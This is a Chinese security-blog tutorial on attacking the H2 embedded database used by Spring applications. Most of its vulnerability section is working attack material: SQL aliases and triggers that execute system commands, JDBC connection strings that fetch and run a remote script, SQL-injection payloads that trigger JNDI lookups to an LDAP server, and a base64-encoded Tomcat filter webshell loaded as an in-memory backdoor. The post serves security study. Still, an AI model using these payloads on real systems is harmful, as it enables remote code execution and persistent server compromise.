来Track安全社区投稿~  

千元稿费！还有保底奖励~（ https://bbs.zkaq.cn）

前言

在学 Spring 框架的利用时发现很多用的是用的 H2 数据库，就来学习一下相关的利用手法

前置学习

介绍

H2 是一个用 Java 开发的嵌入式数据库（如 Spring Boot 默认使用 H2），它本身只是一个类库，即只有一个 jar 文件，可以直接嵌入到应用项目中。H2 主要有如下三个用途：

1. 1. 第一个用途，也是最常使用的用途就在于可以同应用程序打包在一起发布，这样可以非常方便地存储少量结构化数据。
2. 2. 第二个用途是用于单元测试。启动速度快，而且可以关闭持久化功能，每一个用例执行完随即还原到初始状态。
3. 3. 第三个用途是作为缓存，即当做内存数据库，作为NoSQL的一个补充。当某些场景下数据模型必须为关系型，可以拿它当Memcached使，作为后端MySQL/Oracle的一个缓冲层，缓存一些不经常变化但需要频繁访问的数据，比如字典表、权限表。

环境搭建

pom.xml 中加

<dependencies>        <!-- https://mvnrepository.com/artifact/com.h2database/h2 -->        <dependency>            <groupId>com.h2database</groupId>            <artifactId>h2</artifactId>            <version>2.0.204</version>            <scope>compile</scope>        </dependency>    </dependencies>

也有 ui 界面的，下面直接用代码分析了

demo

写个连接的demo

import java.sql.Connection;import java.sql.DriverManager;import java.sql.SQLException;import java.util.Properties;public class demo {    public static void main(String[] args) {        String DRIVER_CLASS = "org.h2.Driver"; //H2 JDBC 驱动的类名        String JDBC_URL = "jdbc:h2:mem:test_any"; // 使用内存数据库        Properties info = new Properties();        info.setProperty("user", "sa");        info.setProperty("password", "");        try {            Class.forName(DRIVER_CLASS); // 加载驱动类            try (Connection conn = DriverManager.getConnection(JDBC_URL, info)) {                System.out.println("连接成功！");            }        } catch (ClassNotFoundException | SQLException e) {            e.printStackTrace();        }    }}

JDBC_URL：连接数据库，这里是 h2 数据库，所以格式是 jdbc:h2:<数据库位置>

• • mem:testdb 表示使用内存数据库（程序结束后数据消失）。
• • 若写为 jdbc:h2:./test，就变成文件数据库，保存在本地。

在 h2 中，默认用户 sa 的密码为空

创建表然后查询下

import java.sql.*;import java.util.Properties;public class create_demo {    public static void main(String[] args) {        String DRIVER_CLASS = "org.h2.Driver";        String JDBC_URL = "jdbc:h2:mem:test_any1";        Properties info = new Properties();        info.setProperty("user", "sa");        info.setProperty("password", "");        try {            Class.forName(DRIVER_CLASS);            try (Connection conn = DriverManager.getConnection(JDBC_URL, info);                 Statement stmt = conn.createStatement()) {                System.out.println("连接H2数据库成功！");                // 创建test表                stmt.execute("CREATE TABLE test (" +                        "id INT PRIMARY KEY, " +                        "username VARCHAR(50), " +                        "age INT)");                System.out.println("表test创建成功");                // 插入数据                stmt.executeUpdate("INSERT INTO test (id, username, age) VALUES " +                        "(1, 'bob', 11), " +                        "(2, 'john', 12)");                System.out.println("数据插入成功");                // 查询验证                System.out.println("n当前表中的数据：");                ResultSet rs = stmt.executeQuery("SELECT * FROM test");                while (rs.next()) {                    System.out.printf("id=%d, username=%s, age=%d%n",                            rs.getInt("id"),                            rs.getString("username"),                            rs.getInt("age"));                }            }        } catch (ClassNotFoundException | SQLException e) {            System.err.println("发生错误:");            e.printStackTrace();        }    }}

conn.createStatement() 创建一个 Statement 对象，用于执行 SQL 语句，其他就是些基础的 sql 语句，不多说，每个操作用到的函数不同，比如插入数据时用 executeUpdate ，实现查询语句时用 executeQuery

漏洞分析

RCE

Alias Script RCE

如果可以执行任意 sql 语句，可以写个自定义函数，这个函数跟 exec 有同样的作用的话就能 rce，和 mysql 数据库中的 udf 一个道理

//创建别名CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\A"); return s.hasNext() ? s.next() : "";  }$$;//调用SHELLEXEC执行命令CALL SHELLEXEC('id');CALL SHELLEXEC('whoami');

创建自定义函数时用的是 execute

INIT RunScript RCE

在H2数据库进行初始化的时候或者当我们可以控制JDBC链接时即可完成RCE，并且有很多利用，首先就是INIT，进行H2连接的时候可以执行一段SQL脚本，我们可以构造恶意的脚本去RCE

poc.sql

CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "test";}';CALL EXEC ('calc')

payload

jdbc:h2:mem:testdb;INIT=RUNSCRIPT FROM 'http://127.0.0.1:9090/poc.sql'

TRIGGER Script RCE

payload

//groovyClass.forName("org.h2.Driver");String groovy = "@groovy.transform.ASTTest(value={" + " assert java.lang.Runtime.getRuntime().exec("calc")" + "})" + "def x";String JDBC_URL    = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE ALIAS T5 AS '" + groovy + "'";//js        String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ONn" +                "INFORMATION_SCHEMA.TABLES AS $$//javascriptn" +                "java.lang.Runtime.getRuntime().exec('calc.exe')n" +                "$$n";

除了 Alias 别名还可以用 TRIGGER 去手搓 groovy 或者 js 代码去 rce，但是 groovy 依赖一般都是不会有的，所以 js 是更加通用的选择，这里将 poc.sql 简化成了一句话而且还不用远程环境交互（不需要指定 MODE 也能成功，大多数 H2 版本默认都支持这类执行行为）

Litch1 翻了 CREATE ALIAS 实现的源代码，发现在 SQL 语句中对于 JAVA 方法的定义被交给了源代码编译器。有三种支持的编译器：Java/Javascript/Groovy，但这貌似还有 ruby（但试了下 ruby，不行，应该要写特殊的依赖或配置）

根据传入的开头来看是哪种编译器，groovy 编译器是调用 GroovyCompiler.parseClass() 来解析 groovy 代码

js 编译器则是调用 org.h2.schema.TriggerObject#loadFromSource，不仅仅编译源代码，还调用了 eval 执行

高版本JDK下的RCE

在上面说到的 TRIGGER Script RCE 中，是依靠 js 来 rce 的，Nashorn 是默认内置的 JavaScript 引擎，但在 JDK 15+ 中，Nashorn 已被移除（除非手动引入）

payload

String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ONn" +                "INFORMATION_SCHEMA.TABLES AS $$ void poc() throws Exception{ Runtime.getRuntime().exec("calc")\;}$$";

还是看到 org.h2.util.SourceCompiler#getClass

public Class<?> getClass(String var1) throws ClassNotFoundException {        Class var2 = (Class)this.compiled.get(var1);        if (var2 != null) {            return var2;        } else {            String var3 = (String)this.sources.get(var1);            if (isGroovySource(var3)) {                Class var5 = SourceCompiler.GroovyCompiler.parseClass(var3, var1);                this.compiled.put(var1, var5);                return var5;            } else {                ClassLoader var4 = new ClassLoader(this.getClass().getClassLoader()) {                    public Class<?> findClass(String var1) throws ClassNotFoundException {                        Class var2 = (Class)SourceCompiler.this.compiled.get(var1);                        if (var2 == null) {                            String var3 = (String)SourceCompiler.this.sources.get(var1);                            String var4 = null;                            int var5 = var1.lastIndexOf(46);                            String var6;                            if (var5 >= 0) {                                var4 = var1.substring(0, var5);                                var6 = var1.substring(var5 + 1);                            } else {                                var6 = var1;                            }                            String var7 = SourceCompiler.getCompleteSourceCode(var4, var6, var3);                            if (SourceCompiler.JAVA_COMPILER != null && SourceCompiler.this.useJavaSystemCompiler) {                                var2 = SourceCompiler.this.javaxToolsJavac(var4, var6, var7);                            } else {                                byte[] var8 = SourceCompiler.this.javacCompile(var4, var6, var7);                                if (var8 == null) {                                    var2 = this.findSystemClass(var1);                                } else {                                    var2 = this.defineClass(var1, var8, 0, var8.length);                                }                            }                            SourceCompiler.this.compiled.put(var1, var2);                        }                        return var2;                    }                };                return var4.loadClass(var1);            }        }    }

这里传入的值如果既不是 groovy 也是不 javascript ，H2 默认会将其当作 Java 源码处理，用 Javac 编译它，最后用 loadClass 加载这个类

调用栈

loadFromSource:113, TriggerObject (org.h2.schema)load:87, TriggerObject (org.h2.schema)setTriggerAction:149, TriggerObject (org.h2.schema)setTriggerSource:142, TriggerObject (org.h2.schema)update:125, CreateTrigger (org.h2.command.ddl)update:173, CommandContainer (org.h2.command)executeUpdate:252, Command (org.h2.command)openSession:279, Engine (org.h2.engine)createSession:201, Engine (org.h2.engine)connectEmbeddedOrServer:338, SessionRemote (org.h2.engine)<init>:117, JdbcConnection (org.h2.jdbc)connect:59, Driver (org.h2)getConnection:681, DriverManager (java.sql)getConnection:190, DriverManager (java.sql)main:25, rce_test

很简单，就是加载我们自己写的 java 代码，不需要任何引擎，INIT RunScript RCE 和 Alias Script RCE 也是一样的

文件读取

官方文档：https://www.h2database.com/html/functions.html#file_read

按照格式来就好了

写文件

还是看官方文档

第一个参数是写入值，第二个参数是写入文件地址

JDBC

用到的是 link_schema 函数

第二个参数是数据库驱动的名称，第三个参数是 jdbc 的连接地址，在连接的时候执行 sql 语句，这里用 INIT RunScript RCE 来打

String username = "bob' union select 1,2,3 from link_schema('any_test', '', 'jdbc:h2:mem:testdb1;INIT=RUNSCRIPT FROM ''http://127.0.0.1:9090/poc.sql''', 'sa', 'sa', 'PUBLIC')--";

JNDI

这里还是用的 link_schema 函数，根据到其实现类 org.h2.expression.function.table.LinkSchemaFunction 的 getValue 函数

JdbcUtils.getConnection 的 var3、var4 就是我们传入的数据库驱动的名称和 url 地址，跟进其实现

如果 url 是 jdbc:h2: 开头，就 jdbc 连接，如果不是就用 loadUserClass 加载，loadUserClass 中写明了所有类都允许加载，然后回到 JdbcUtils.getConnection 中，如果是加载的类 javax.naming.Context 类或其子类、实现类，就直接 lookup，

可以直接加载 javax.naming.InitialContext，打jndi , payload

String username = "bob' union select 1,2,3 from link_schema('any_test', 'javax.naming.InitialContext', 'ldap://127.0.0.1:1389/v6uu9g', 'sa', 'sa', 'PUBLIC')--";

这个对于 h2 依赖版本有限制，2.1.x全版本都有限制，2.0.x < 2.0.206 无限制

内存马

不出网的情况下方便 rce，写入本地文件中然后发起 jdbc 连接

poc.sql

CREATE ALIAS EXEC AS '    void e(String cmd) throws Exception{        String evilClassBase64 = "yv66vgAAADQBTQoAIQC5CgC6ALsKALwAvQoAvAC+CgC6AL8KACEAwAoAwQC7BwDCCgAhAMMKAEgAxAoAIwDFCgDBAMYKAEkAxwoAyADJCgDIAMoHAMsIAH8KAEgAzAcAzQoAEwDOBwDPCADQBwDRCgAXAMcKABcA0ggA0woAFwDUBwDVCgAcAMcKABwA0goAHADWBwDXBwDYBwDZBwDaCgBIANsIAIoHANwKACYA3QoAFQDeCgAVAN8IAOALAOEA4gsA4wDkCADlCADmCgDnAOgKADQA6QgA6goANADrBwDsBwDtCADuCADvCgAzAPAIAPEIAPIHAPMKADMA9AoA9QD2CgA6APcIAPgKADoA+QoAOgD6CgA6APsKADoA/AoA/QD+CgD9AP8KAP0A/AsBAAEBBwECBwEDBwEEBwEFAQAVY3JlYXRlV2l0aENvbnN0cnVjdG9yAQBbKExqYXZhL2xhbmcvQ2xhc3M7TGphdmEvbGFuZy9DbGFzcztbTGphdmEvbGFuZy9DbGFzcztbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBABJjbGFzc1RvSW5zdGFudGlhdGUBABFMamF2YS9sYW5nL0NsYXNzOwEAEGNvbnN0cnVjdG9yQ2xhc3MBAAxjb25zQXJnVHlwZXMBABJbTGphdmEvbGFuZy9DbGFzczsBAAhjb25zQXJncwEAE1tMamF2YS9sYW5nL09iamVjdDsBAAdvYmpDb25zAQAfTGphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yOwEAAnNjAQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEAFkxqYXZhL2xhbmcvQ2xhc3M8VFQ7PjsBABdMamF2YS9sYW5nL0NsYXNzPC1UVDs+OwEAFVtMamF2YS9sYW5nL0NsYXNzPCo+OwEAJUxqYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcjwtVFQ7PjsBACJMamF2YS9sYW5nL3JlZmxlY3QvQ29uc3RydWN0b3I8Kj47AQAKRXhjZXB0aW9ucwEACVNpZ25hdHVyZQEAcDxUOkxqYXZhL2xhbmcvT2JqZWN0Oz4oTGphdmEvbGFuZy9DbGFzczxUVDs+O0xqYXZhL2xhbmcvQ2xhc3M8LVRUOz47W0xqYXZhL2xhbmcvQ2xhc3M8Kj47W0xqYXZhL2xhbmcvT2JqZWN0OylUVDsBAAhnZXRGaWVsZAEAPihMamF2YS9sYW5nL0NsYXNzO0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQACZXgBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEABWNsYXp6AQAJZmllbGROYW1lAQASTGphdmEvbGFuZy9TdHJpbmc7AQAFZmllbGQBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAUTGphdmEvbGFuZy9DbGFzczwqPjsBAA1TdGFja01hcFRhYmxlBwDYBwDtBwEGBwDCAQBBKExqYXZhL2xhbmcvQ2xhc3M8Kj47TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA1nZXRGaWVsZFZhbHVlAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsBAANvYmoBABJMamF2YS9sYW5nL09iamVjdDsBAAlmaWVsZG5hbWUBAAFvAQAGPGluaXQ+AQADKClWAQAEdGhpcwEADUxGaWx0ZXJTaGVsbDsBABV3ZWJhcHBDbGFzc0xvYWRlckJhc2UBADJMb3JnL2FwYWNoZS9jYXRhbGluYS9sb2FkZXIvV2ViYXBwQ2xhc3NMb2FkZXJCYXNlOwEACXJlc291cmNlcwEAL0xvcmcvYXBhY2hlL2NhdGFsaW5hL3dlYnJlc291cmNlcy9TdGFuZGFyZFJvb3Q7AQAHY29udGV4dAEAKkxvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvU3RhbmRhcmRDb250ZXh0OwEACmZpbHRlck5hbWUBAAlmaWx0ZXJNYXABADFMb3JnL2FwYWNoZS90b21jYXQvdXRpbC9kZXNjcmlwdG9yL3dlYi9GaWx0ZXJNYXA7AQAJZmlsdGVyRGVmAQAxTG9yZy9hcGFjaGUvdG9tY2F0L3V0aWwvZGVzY3JpcHRvci93ZWIvRmlsdGVyRGVmOwEAF2FwcGxpY2F0aW9uRmlsdGVyQ29uZmlnAQAyTG9yZy9hcGFjaGUvY2F0YWxpbmEvY29yZS9BcHBsaWNhdGlvbkZpbHRlckNvbmZpZzsBAA1maWx0ZXJDb25maWdzAQATTGphdmEvdXRpbC9IYXNoTWFwOwEAWUxqYXZhL3V0aWwvSGFzaE1hcDxMamF2YS9sYW5nL1N0cmluZztMb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL0FwcGxpY2F0aW9uRmlsdGVyQ29uZmlnOz47AQAIZG9GaWx0ZXIBAFsoTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlO0xqYXZheC9zZXJ2bGV0L0ZpbHRlckNoYWluOylWAQABcAEAGkxqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXI7AQAGd3JpdGVyAQAVTGphdmEvaW8vUHJpbnRXcml0ZXI7AQABYwEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAARhcmcwAQAHcmVxdWVzdAEAHkxqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0OwEACHJlc3BvbnNlAQAfTGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOwEABWNoYWluAQAbTGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47BwEHBwDsBwDzBwEDBwEIBwEJBwEKBwECBwELBwEMAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwcBDQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAEaW5pdAEAHyhMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7KVYBAAxmaWx0ZXJDb25maWcBABxMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7AQAHZGVzdHJveQEAClNvdXJjZUZpbGUBABBGaWx0ZXJTaGVsbC5qYXZhDAEOAQ8HARAMAREBEgcBEwwBFAEVDAEWARcMARgBGQwBGgEbBwEGAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDAEcAR0MAGMAZAwBHgEdDAEfASAMAHkAegcBIQwBIgEjDAEkASUBADBvcmcvYXBhY2hlL2NhdGFsaW5hL2xvYWRlci9XZWJhcHBDbGFzc0xvYWRlckJhc2UMAHMAdAEALW9yZy9hcGFjaGUvY2F0YWxpbmEvd2VicmVzb3VyY2VzL1N0YW5kYXJkUm9vdAwBJgEnAQAob3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL1N0YW5kYXJkQ29udGV4dAEABWZmZmZmAQAvb3JnL2FwYWNoZS90b21jYXQvdXRpbC9kZXNjcmlwdG9yL3dlYi9GaWx0ZXJNYXAMASgBKQEAAi8qDAEqASkBAC9vcmcvYXBhY2hlL3RvbWNhdC91dGlsL2Rlc2NyaXB0b3Ivd2ViL0ZpbHRlckRlZgwBKwEsAQAwb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL0FwcGxpY2F0aW9uRmlsdGVyQ29uZmlnAQAPamF2YS9sYW5nL0NsYXNzAQAbb3JnL2FwYWNoZS9jYXRhbGluYS9Db250ZXh0AQAQamF2YS9sYW5nL09iamVjdAwASwBMAQARamF2YS91dGlsL0hhc2hNYXAMAS0BLgwBLwEwDAExATIBAANjbWQHAQgMATMBNAcBCQwBNQE2AQAAAQAHb3MubmFtZQcBNwwBOAE0DAE5AToBAAN3aW4MATsBPAEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgEAEGphdmEvbGFuZy9TdHJpbmcBAAdjbWQuZXhlAQACL2MMAHkBPQEABy9iaW4vc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyDAE+AT8HAUAMAUEBQgwAeQFDAQACXEEMAUQBRQwBRgFHDAFIAToMAUkAegcBBwwBSgEpDAFLAHoHAQoMAI0BTAEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAtGaWx0ZXJTaGVsbAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABRqYXZheC9zZXJ2bGV0L0ZpbHRlcgEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQATamF2YS9pby9QcmludFdyaXRlcgEAHGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3QBAB1qYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZQEAGWphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW4BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAeamF2YXgvc2VydmxldC9TZXJ2bGV0RXhjZXB0aW9uAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAWZ2V0RGVjbGFyZWRDb25zdHJ1Y3RvcgEAMyhbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yOwEAHWphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yAQANc2V0QWNjZXNzaWJsZQEABChaKVYBAB1zdW4vcmVmbGVjdC9SZWZsZWN0aW9uRmFjdG9yeQEAFGdldFJlZmxlY3Rpb25GYWN0b3J5AQAhKClMc3VuL3JlZmxlY3QvUmVmbGVjdGlvbkZhY3Rvcnk7AQAebmV3Q29uc3RydWN0b3JGb3JTZXJpYWxpemF0aW9uAQBRKExqYXZhL2xhbmcvQ2xhc3M7TGphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yOylMamF2YS9sYW5nL3JlZmxlY3QvQ29uc3RydWN0b3I7AQALbmV3SW5zdGFuY2UBACcoW0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQANZ2V0U3VwZXJjbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAAhnZXRDbGFzcwEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAQamF2YS9sYW5nL1RocmVhZAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAApnZXRDb250ZXh0AQAfKClMb3JnL2FwYWNoZS9jYXRhbGluYS9Db250ZXh0OwEADXNldEZpbHRlck5hbWUBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAA1hZGRVUkxQYXR0ZXJuAQAJc2V0RmlsdGVyAQAZKExqYXZheC9zZXJ2bGV0L0ZpbHRlcjspVgEAA3B1dAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAMYWRkRmlsdGVyRGVmAQA0KExvcmcvYXBhY2hlL3RvbWNhdC91dGlsL2Rlc2NyaXB0b3Ivd2ViL0ZpbHRlckRlZjspVgEADGFkZEZpbHRlck1hcAEANChMb3JnL2FwYWNoZS90b21jYXQvdXRpbC9kZXNjcmlwdG9yL3dlYi9GaWx0ZXJNYXA7KVYBAAxnZXRQYXJhbWV0ZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQALdG9Mb3dlckNhc2UBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEA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";        byte[] bytes = java.util.Base64.getDecoder().decode(evilClassBase64);        java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);        method.setAccessible(true);        ((Class)method.invoke(ClassLoader.getSystemClassLoader(), "FilterShell", bytes, 0, bytes.length)).newInstance();    }    ';CALL EXEC('calc');

或者打 TRIGGER Script RCE

